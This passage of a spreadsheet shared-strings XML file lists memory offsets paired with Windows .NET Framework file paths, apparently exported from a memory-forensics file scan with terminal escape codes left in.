    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccb800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccba80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccbd00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\clrcompression.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccbf80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccc038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtilLib.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccc1d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework-SystemDrawing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccc450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccc6d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccc950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\1033\CvtResUI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecccbd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\dfdll.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccce50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\EventLogMessages.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccd298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccd518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ISymWrapper.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccd798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccda18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccdc98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework-SystemCore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccdf18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.Wrapper.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecce300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Threading.Tasks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecce580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Threading.Tasks.Parallel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecce800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.ReaderWriter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccea80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.XDocument.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecced00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.XmlSerializer.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccef80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Http.Rtc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccf038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Threading.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccf1d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Primitives.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccf450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccf6d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Security.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccf950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Text.Encoding.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccfbd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Text.Encoding.Extensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccfe50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Text.RegularExpressions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd0298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd0518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\sysglobl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd0798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Configuration.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd0a18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Configuration.Install.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd0c98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Dynamic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd0f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd1300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\CustomMarshalers.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd1580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd1800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd1a80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.JScript.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd1d00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.VisualBasic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd1f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.VisualC.Dll_x001B_[0K_x001B_[86G</t>
  </si>
  <si>
    <t>0xdecd2038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd21d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd2450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.CSharp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd26d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Accessibility.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd2950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd2bd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd2e50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd3298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Linq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd3518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Linq.Expressions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd3798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Linq.Parallel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd3a18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Linq.Queryable.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd3c98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Duplex.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd3f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.NetTcp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd4300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Diagnostics.Debug.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd4580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Diagnostics.Tools.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd4800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Diagnostics.Tracing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd4a80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Dynamic.Runtime.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd4d00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Globalization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd4f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd5038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Diagnostics.Contracts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd51d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Http.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd5450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.NetworkInformation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd56d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Collections.Concurrent.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd5950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ComponentModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd5bd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ComponentModel.Annotations.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd5e50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ComponentModel.EventBasedAsync.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd6298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Serialization.Json.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd6518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Serialization.Primitives.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd6798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Serialization.Xml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd6a18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Security.Principal.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd6c98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ObjectModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd6f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Primitives.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd7300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.Primitives.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd7580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd7800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Extensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd7a80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.InteropServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd7d00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.InteropServices.WindowsRuntime.dll_x001B_</t>
  </si>
  <si>
    <t>0xdecd7f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Numerics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd8038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.Extensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd81d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.SqlXml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd8450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Requests.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd86d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd8950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.Emit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd8bd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.Emit.ILGeneration.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd8e50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.Emit.Lightweight.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd9298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IdentityModel.Selectors.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd9518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Log.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd9798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.DurableInstancing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd9a18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Serialization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd9c98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecd9f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Deployment.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecda300</t>
  </si>
  <si>
    <t>0xdecda580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Activities.Core.Presentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecda800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Activities.Presentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdaa80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Activities.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdad00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Activities.DurableInstancing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdaf80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IdentityModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdb038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\SMDiagnostics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdb1d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Serialization.Formatters.Soap.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdecdb450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdb6d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Remoting.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdb950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Transactions.Bridge.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdbbd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Transactions.Bridge.Dtc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdbe50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.d</t>
  </si>
  <si>
    <t>0xdecdc188</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.Luna.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdc408</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.Royale.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdc688</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.AeroLite.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdcc98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationUI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdcf18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Activities.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdd238</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\System.Speech.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdd4b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\System.Printing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdd738</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationCore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdd9b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_x001B_[0K_x001B_[85G</t>
  </si>
  <si>
    <t>0xdecddc38</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.Aero.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecddeb8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.Classic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecde300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Services.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecde580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Channels.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecde800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Internals.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdea80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Routing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecded00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.Serialization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdef80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xaml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdf038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Transactions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdf1d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.AddIn.Contract.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdf450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.AddIn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdf6d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ComponentModel.Composition.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdf950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\system.componentmodel.composition.registration.dll</t>
  </si>
  <si>
    <t>0xdecdfbd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.context.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecdfe50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Messaging.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece0298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece0518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Security.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece0798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceProcess.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece0a18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece0c98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.DataVisualization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece0f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.XML.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece1228</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece1398</t>
  </si>
  <si>
    <t>0xdece1a00</t>
  </si>
  <si>
    <t>0xdece1ab8</t>
  </si>
  <si>
    <t>0xdece1c20</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AF3BA1CDD96BBC740C9CE3754F</t>
  </si>
  <si>
    <t>348BED_5B6370</t>
  </si>
  <si>
    <t>DF650E34D87</t>
  </si>
  <si>
    <t>F569B1</t>
  </si>
  <si>
    <t>4932A144C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece1d48</t>
  </si>
  <si>
    <t>0xdece2300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece2580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ComponentModel.DataAnnotations.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece2800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.AccountManagement.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece2a80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.Protocols.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece2d00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece2f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece3038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.DataSetExtensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece31d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.ApplicationServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece3450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.Linq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece36d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.VisualBasic.Compatibility.Data.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece3950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.VisualBasic.Compatibility.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece3bd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.VisualBasic.Activities.Compiler.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece3e50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Entity.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece4298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Http.WebRequest.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece4518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Numerics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece4798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece4a18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceMonikerSupport.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece4c98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.FileSystem.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece4f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Device.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece5300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Internal.Tasks.Dataflow.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece5580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Linq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece5800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Services.Client.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece5a80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.Instrumentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece5d00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece5f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Http.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece6038</t>
  </si>
  <si>
